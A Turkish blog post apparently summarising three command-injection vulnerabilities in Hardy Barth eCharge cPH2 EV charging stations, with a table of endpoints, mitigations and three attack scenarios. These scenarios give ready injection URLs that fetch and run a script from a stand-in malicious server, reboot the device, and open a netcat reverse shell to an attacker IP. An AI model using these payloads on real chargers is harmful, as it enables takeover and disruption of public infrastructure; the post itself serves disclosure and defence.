Elektrikli Araç Şarj İstasyonlarında Uzaktan Kod Çalıştırma Tehlikesi

 

Elektrikli Araç Şarj İstasyonlarında Uzaktan Kod Çalıştırma Tehlikesi

Elektrikli araçlar (EV) dünya genelinde hızla yaygınlaşırken, onları destekleyen altyapının — özellikle de kamusal şarj istasyonlarının — güvenliği hayati önem taşıyor. Ancak Hardy Barth’ın eCharge cPH2 modeline ait şarj istasyonlarında keşfedilen üç kritik güvenlik açığı, bu sistemlerin ne kadar savunmasız olabileceğini gözler önüne seriyor.

CVE-2025-3881CVE-2025-3882 ve CVE-2025-3883 olarak listelenen bu açıklar sayesinde, kimlik doğrulaması gerekmeden, yerel ağa bağlı bir saldırgan hedef sisteme uzaktan komut çalıştırabiliyor. (Yayınlanma Tarihi: Mayıs 21, 2025)


Zafiyetlerin Özeti

Her üç açık da farklı uç noktaları etkiliyor fakat sonuç aynı: Web sunucusu kullanıcısı (www-data) yetkileriyle uzaktan kod çalıştırma (RCE).

CVE Kimliği Uç Nokta Zayıf Parametre Saldırı Türü Temel Puan
CVE-2025-3881 check_req.php ntp Komut Enjeksiyonu 8.8 YÜKSEK
CVE-2025-3882 nwcheckexec.php dest Komut Enjeksiyonu 8.8 YÜKSEK
CVE-2025-3883 index.php (Açıklanmadı) Komut Enjeksiyonu 8.8 YÜKSEK

Bu güvenlik açıkları, Zero Day Initiative (ZDI) tarafından bildirildi ve ilk olarak ZDI-CAN-23113 ila 23115 olarak tanımlandı.


Gerçekçi Saldırı Senaryoları

1. Alışveriş Merkezinde Drive-by Saldırısı (CVE-2025-3881)

Bir saldırgan, alışveriş merkezinin otoparkındaki şarj istasyonunun bulunduğu Wi-Fi ağına bağlanıyor. Şu isteği gönderiyor:

http://192.168.100.20/check_req.php?ntp=;wget http://kötü-server.com/kötü.sh|sh

Sonuç: Zararlı yazılım istasyona indirilip çalıştırılıyor. Şarj istasyonu artık saldırganın ağına bağlı bir bot haline geliyor.


2. EV Hizmetlerinin Yeniden Başlatılması (CVE-2025-3882) 

Saldırgan nwcheckexec.php uç noktasını kullanarak şunu gönderiyor:

http://192.168.100.20/nwcheckexec.php?dest=;reboot

Sonuç: Şarj istasyonu aniden yeniden başlatılıyor. Kullanıcılar kesintiye uğruyor, hizmet güvenilirliği zedeleniyor.


3. Ters Kabuk Erişimi (CVE-2025-3883) 

Gelişmiş bir saldırgan, index.php dosyasını kullanarak şu kodu enjekte ediyor:

http://192.168.100.20/index.php?cmd=ping;nc -e /bin/sh saldırgan_ip 4444

Sonuç: Saldırgan, şarj istasyonuna tam terminal erişimi elde ediyor. Sisteme sızıyor, kalıcı arka kapılar bırakabiliyor.


Bu Güvenlik Açıkları Neden Önemli? 

Bu açıklar yalnızca teorik tehditler değil. Şarj istasyonları çoğunlukla:

  • Kritik altyapılara (ör. toplu taşıma, otopark ağları) bağlıdır.
  • Halka açık veya yarı-açık ağlar üzerinden erişilebilir durumdadır.
  • Kullanıcı bilgileri, faturalama ve cihaz günlükleri gibi verileri içerir.

Bu sistemlere yönelik bir saldırı yalnızca cihazı değil, bağlı bulunduğu tüm ağı ve veri güvenliğini etkileyebilir.


Alınması Gereken Önlemler 

Hardy Barth cPH2 serisini kullanıyorsanız, aşağıdaki adımları acilen uygulayın:

  1. Güncellemeleri Yükleyin: Üretici tarafından yayınlanan en son firmware'i kurun.
  2. Ağları Ayırın: Şarj cihazlarını izole edilmiş VLAN’larda konumlandırın.
  3. Web Uygulama Güvenlik Duvarı (WAF) Kullanın: Kötü niyetli GET isteklerini engelleyin.
  4. Günlükleri Takip Edin: Özellikle index.phpcheck_req.php ve nwcheckexec.php isteklerini izleyin.

Sonuç 

Bu komut enjeksiyonu açıkları şunu açıkça ortaya koyuyor:
Geleceğin ulaşımı bugünden güvence altına alınmalıdır.

Bağlantılı cihazların hızla yaygınlaştığı bu dönemde, girdi doğrulama, güçlü kimlik doğrulama ve güvenli dağıtım standart haline gelmelidir.

Altyapınızı zincirin en zayıf halkası haline getirmeyin.


Daha fazla CVE analizi ve uygulamalı siber güvenlik içeriği için beni takip edin.


Yorum Gönder

Daha yeni Daha eski

İletişim Formu